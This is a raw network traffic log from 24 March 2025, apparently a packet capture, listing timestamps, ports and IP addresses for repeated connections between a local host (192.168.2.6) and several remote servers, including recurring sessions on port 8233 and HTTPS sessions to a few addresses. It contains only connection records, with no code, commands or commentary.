Mar 24, 2025 14:42:48.391124964 CET	443	49729	104.168.138.190	192.168.2.6
Mar 24, 2025 14:42:48.391448021 CET	443	49729	104.168.138.190	192.168.2.6
Mar 24, 2025 14:42:48.392128944 CET	49729	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:42:48.436333895 CET	443	49729	104.168.138.190	192.168.2.6
Mar 24, 2025 14:42:48.492074013 CET	443	49730	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.492233992 CET	443	49730	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.492316008 CET	49730	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.496608973 CET	49730	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.496629953 CET	443	49730	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.499075890 CET	49728	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:48.504054070 CET	49731	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.504096031 CET	443	49731	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.504160881 CET	49731	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.508248091 CET	49731	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.508272886 CET	443	49731	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.692055941 CET	8233	49728	185.174.100.76	192.168.2.6
Mar 24, 2025 14:42:48.714065075 CET	443	49731	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.714642048 CET	49731	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.714642048 CET	49731	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.714664936 CET	443	49731	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.714674950 CET	443	49731	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.964375973 CET	443	49731	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.964543104 CET	443	49731	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.964646101 CET	49731	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.965574026 CET	49731	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.965598106 CET	443	49731	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:54.728497982 CET	49687	80	192.168.2.6	142.251.41.3
Mar 24, 2025 14:42:54.824193954 CET	80	49687	142.251.41.3	192.168.2.6
Mar 24, 2025 14:42:54.824274063 CET	49687	80	192.168.2.6	142.251.41.3
Mar 24, 2025 14:42:55.815118074 CET	49689	443	192.168.2.6	23.219.82.9
Mar 24, 2025 14:42:55.815450907 CET	49691	80	192.168.2.6	23.203.176.221
Mar 24, 2025 14:43:05.350187063 CET	443	49729	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:05.350358009 CET	443	49729	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:05.350517988 CET	49729	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:05.351286888 CET	49729	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:05.351304054 CET	443	49729	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:05.560647964 CET	49734	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:05.560682058 CET	443	49734	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:05.560807943 CET	49734	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:05.560909033 CET	49734	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:05.560916901 CET	443	49734	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:05.871807098 CET	443	49734	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:05.872021914 CET	49734	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:05.872858047 CET	49734	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:05.872865915 CET	443	49734	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:05.873667955 CET	443	49734	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:05.874027967 CET	49734	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:05.920352936 CET	443	49734	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:06.344541073 CET	443	49734	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:06.344702959 CET	443	49734	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:06.344819069 CET	49734	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:06.345458984 CET	49734	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:06.345474958 CET	443	49734	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:11.302278042 CET	443	49681	2.23.227.215	192.168.2.6
Mar 24, 2025 14:43:11.302393913 CET	443	49681	2.23.227.215	192.168.2.6
Mar 24, 2025 14:43:11.302588940 CET	49681	443	192.168.2.6	2.23.227.215
Mar 24, 2025 14:43:11.302588940 CET	49681	443	192.168.2.6	2.23.227.215
Mar 24, 2025 14:43:15.795413971 CET	49738	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:43:15.795500040 CET	443	49738	142.251.40.196	192.168.2.6
Mar 24, 2025 14:43:15.795599937 CET	49738	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:43:15.795799017 CET	49738	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:43:15.795816898 CET	443	49738	142.251.40.196	192.168.2.6
Mar 24, 2025 14:43:15.992965937 CET	443	49738	142.251.40.196	192.168.2.6
Mar 24, 2025 14:43:15.993283033 CET	49738	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:43:15.993325949 CET	443	49738	142.251.40.196	192.168.2.6
Mar 24, 2025 14:43:20.348750114 CET	49740	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:20.348823071 CET	443	49740	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:20.348898888 CET	49740	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:20.349129915 CET	49740	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:20.349144936 CET	443	49740	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:20.350231886 CET	49741	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:20.498359919 CET	8233	49741	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:20.498512030 CET	49741	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:20.500329971 CET	49741	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:20.648510933 CET	8233	49741	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:20.649229050 CET	49741	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:20.650142908 CET	49741	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:20.651356936 CET	443	49740	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:20.652021885 CET	49740	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:20.652055025 CET	443	49740	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:20.652157068 CET	49740	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:20.652163982 CET	443	49740	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:20.798906088 CET	8233	49741	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:20.798944950 CET	8233	49741	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:20.804570913 CET	49742	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:20.804625988 CET	443	49742	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:20.804696083 CET	49742	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:20.804842949 CET	49742	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:20.804858923 CET	443	49742	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:20.842581987 CET	49741	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:21.003140926 CET	443	49742	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:21.003424883 CET	49742	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:21.003462076 CET	443	49742	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:21.003560066 CET	49742	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:21.003566027 CET	443	49742	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:21.254045963 CET	443	49742	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:21.254131079 CET	443	49742	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:21.254220009 CET	49742	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:21.255388975 CET	49742	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:21.255436897 CET	443	49742	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:21.256536961 CET	49741	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:21.258506060 CET	49744	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:21.258564949 CET	443	49744	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:21.258649111 CET	49744	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:21.258785963 CET	49744	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:21.258800983 CET	443	49744	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:21.445964098 CET	8233	49741	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:21.459235907 CET	443	49744	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:21.459542990 CET	49744	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:21.459628105 CET	443	49744	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:21.459681988 CET	49744	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:21.459698915 CET	443	49744	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:21.707979918 CET	443	49744	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:21.708062887 CET	443	49744	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:21.708153009 CET	49744	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:21.708893061 CET	49744	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:21.708916903 CET	443	49744	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:25.904512882 CET	49725	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:26.009840965 CET	443	49738	142.251.40.196	192.168.2.6
Mar 24, 2025 14:43:26.009908915 CET	443	49738	142.251.40.196	192.168.2.6
Mar 24, 2025 14:43:26.009989023 CET	49738	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:43:26.059520006 CET	8233	49725	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:26.105576992 CET	49738	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:43:26.105601072 CET	443	49738	142.251.40.196	192.168.2.6
Mar 24, 2025 14:43:33.074245930 CET	443	49740	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:33.074330091 CET	443	49740	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:33.074404955 CET	49740	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:33.075680017 CET	49740	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:33.075697899 CET	443	49740	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:33.090935946 CET	49749	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:33.091032982 CET	443	49749	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:33.091161013 CET	49749	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:33.091301918 CET	49749	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:33.091325998 CET	443	49749	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:33.398638010 CET	443	49749	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:33.399029970 CET	49749	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:33.399081945 CET	443	49749	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:33.399240971 CET	49749	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:33.399249077 CET	443	49749	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:33.703511000 CET	49728	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:33.857002020 CET	8233	49728	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:33.897509098 CET	443	49749	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:33.897695065 CET	443	49749	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:33.897787094 CET	49749	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:33.903063059 CET	49749	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:33.903119087 CET	443	49749	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:42.841517925 CET	49682	443	192.168.2.6	40.126.16.164
Mar 24, 2025 14:43:43.121318102 CET	443	49682	40.126.16.164	192.168.2.6
Mar 24, 2025 14:43:43.121539116 CET	49682	443	192.168.2.6	40.126.16.164
Mar 24, 2025 14:43:44.036998034 CET	49752	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:44.037036896 CET	443	49752	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:44.037174940 CET	49752	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:44.037834883 CET	49753	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:44.038124084 CET	49752	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:44.038137913 CET	443	49752	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:44.187078953 CET	8233	49753	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:44.187180996 CET	49753	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:44.187508106 CET	49753	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:44.336852074 CET	8233	49753	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:44.337179899 CET	49753	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:44.337622881 CET	49753	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:44.343508005 CET	443	49752	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:44.343795061 CET	49752	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:44.343818903 CET	443	49752	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:44.343967915 CET	49752	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:44.343972921 CET	443	49752	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:44.487596035 CET	8233	49753	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:44.487948895 CET	8233	49753	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:44.532648087 CET	49753	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:44.621166945 CET	49754	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:44.621232986 CET	443	49754	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:44.621334076 CET	49754	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:44.621490002 CET	49754	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:44.621505022 CET	443	49754	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:44.815721035 CET	443	49752	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:44.815902948 CET	443	49752	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:44.815968990 CET	49752	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:44.816533089 CET	49752	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:44.816553116 CET	443	49752	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:44.820013046 CET	49755	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:44.820058107 CET	443	49755	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:44.820123911 CET	49755	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:44.820373058 CET	49755	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:44.820388079 CET	443	49755	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:44.821110010 CET	443	49754	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:44.821472883 CET	49754	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:44.821508884 CET	443	49754	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:44.821623087 CET	49754	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:44.821629047 CET	443	49754	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:45.092823029 CET	443	49754	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:45.092891932 CET	443	49754	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:45.092941999 CET	49754	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:45.094412088 CET	49754	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:45.094433069 CET	443	49754	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:45.095791101 CET	49753	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:45.098151922 CET	49756	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:45.098201036 CET	443	49756	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:45.098263979 CET	49756	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:45.098433018 CET	49756	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:45.098452091 CET	443	49756	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:45.129436016 CET	443	49755	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:45.129935026 CET	49755	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:45.129957914 CET	443	49755	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:45.129988909 CET	49755	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:45.129993916 CET	443	49755	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:45.286066055 CET	8233	49753	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:45.304560900 CET	443	49756	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:45.305037975 CET	49756	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:45.305080891 CET	443	49756	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:45.305098057 CET	49756	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:45.305104017 CET	443	49756	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:45.558048010 CET	443	49756	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:45.558217049 CET	443	49756	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:45.558285952 CET	49756	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:45.559303045 CET	49756	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:45.559325933 CET	443	49756	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:45.598321915 CET	443	49755	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:45.598504066 CET	443	49755	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:45.598586082 CET	49755	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:45.599450111 CET	49755	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:45.599473000 CET	443	49755	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:47.778961897 CET	49693	443	192.168.2.6	184.31.69.3
Mar 24, 2025 14:43:47.868575096 CET	443	49693	184.31.69.3	192.168.2.6
Mar 24, 2025 14:43:47.868599892 CET	443	49693	184.31.69.3	192.168.2.6
Mar 24, 2025 14:43:47.868813038 CET	49693	443	192.168.2.6	184.31.69.3
Mar 24, 2025 14:43:47.868948936 CET	49693	443	192.168.2.6	184.31.69.3
Mar 24, 2025 14:43:48.388003111 CET	49694	443	192.168.2.6	184.31.69.3
Mar 24, 2025 14:43:48.479166031 CET	443	49694	184.31.69.3	192.168.2.6
Mar 24, 2025 14:43:48.479191065 CET	443	49694	184.31.69.3	192.168.2.6
Mar 24, 2025 14:43:48.479273081 CET	49694	443	192.168.2.6	184.31.69.3
Mar 24, 2025 14:43:48.479310989 CET	49694	443	192.168.2.6	184.31.69.3
Mar 24, 2025 14:43:52.893728018 CET	49757	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:52.893795967 CET	443	49757	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:52.893879890 CET	49757	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:52.894849062 CET	49758	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:52.895061016 CET	49757	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:52.895090103 CET	443	49757	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:53.044251919 CET	8233	49758	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:53.044447899 CET	49758	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:53.045310020 CET	49758	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:53.194561005 CET	8233	49758	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:53.194945097 CET	49758	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:53.195190907 CET	49758	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:53.198510885 CET	443	49757	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:53.198903084 CET	49757	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:53.198945999 CET	443	49757	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:53.199140072 CET	49757	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:53.199146986 CET	443	49757	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:53.345206022 CET	8233	49758	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:53.345402956 CET	8233	49758	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:53.348392963 CET	49759	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:53.348444939 CET	443	49759	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:53.348516941 CET	49759	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:53.348665953 CET	49759	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:53.348681927 CET	443	49759	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:53.388108015 CET	49758	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:53.549792051 CET	443	49759	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:53.550218105 CET	49759	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:53.550250053 CET	443	49759	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:53.550273895 CET	49759	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:53.550280094 CET	443	49759	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:53.679106951 CET	443	49757	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:53.679256916 CET	443	49757	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:53.679311037 CET	49757	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:53.680505037 CET	49757	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:53.680532932 CET	443	49757	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:53.739279985 CET	49760	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:53.739362001 CET	443	49760	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:53.739546061 CET	49760	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:53.739590883 CET	49760	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:53.739602089 CET	443	49760	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:53.796647072 CET	443	49759	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:53.796716928 CET	443	49759	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:53.796911955 CET	49759	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:53.803136110 CET	49759	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:43:53.803163052 CET	443	49759	104.26.12.205	192.168.2.6
Mar 24, 2025 14:43:53.804301023 CET	49758	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:43:53.806952000 CET	49761	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:53.807005882 CET	443	49761	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:53.807120085 CET	49761	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:53.906923056 CET	49761	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:53.907025099 CET	443	49761	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:53.993429899 CET	8233	49758	185.174.100.76	192.168.2.6
Mar 24, 2025 14:43:54.042684078 CET	443	49760	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:54.043135881 CET	49760	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:54.043169975 CET	443	49760	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:54.043327093 CET	49760	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:54.043333054 CET	443	49760	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:54.107163906 CET	443	49761	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:54.111967087 CET	49761	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:54.112063885 CET	443	49761	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:54.112102032 CET	49761	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:54.112131119 CET	443	49761	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:54.354671001 CET	443	49761	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:54.354871988 CET	443	49761	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:54.354932070 CET	49761	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:54.356151104 CET	49761	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:43:54.356172085 CET	443	49761	172.67.74.152	192.168.2.6
Mar 24, 2025 14:43:54.528541088 CET	443	49760	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:54.528628111 CET	443	49760	104.168.138.190	192.168.2.6
Mar 24, 2025 14:43:54.528682947 CET	49760	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:54.529376030 CET	49760	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:43:54.529402971 CET	443	49760	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:04.846512079 CET	49762	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:04.846565008 CET	443	49762	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:04.846652985 CET	49762	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:04.847501993 CET	49763	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:04.847709894 CET	49762	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:04.847723961 CET	443	49762	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:04.998485088 CET	8233	49763	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:04.998651981 CET	49763	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:04.998867989 CET	49763	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:05.149782896 CET	443	49762	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:05.150038004 CET	8233	49763	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:05.163532019 CET	49763	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:05.163651943 CET	49762	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:05.163686037 CET	443	49762	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:05.164071083 CET	49763	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:05.164144039 CET	49762	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:05.164150953 CET	443	49762	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:05.318075895 CET	8233	49763	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:05.318128109 CET	8233	49763	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:05.336215019 CET	49764	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:05.336261988 CET	443	49764	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:05.336321115 CET	49764	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:05.336858988 CET	49764	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:05.336870909 CET	443	49764	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:05.363718987 CET	49763	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:05.543346882 CET	443	49764	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:05.543590069 CET	49764	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:05.543601990 CET	443	49764	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:05.543735027 CET	49764	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:05.543739080 CET	443	49764	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:05.620871067 CET	443	49762	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:05.620961905 CET	443	49762	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:05.621016026 CET	49762	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:05.621445894 CET	49762	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:05.621467113 CET	443	49762	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:05.625052929 CET	49765	443	192.168.2.6	104.168.138.190
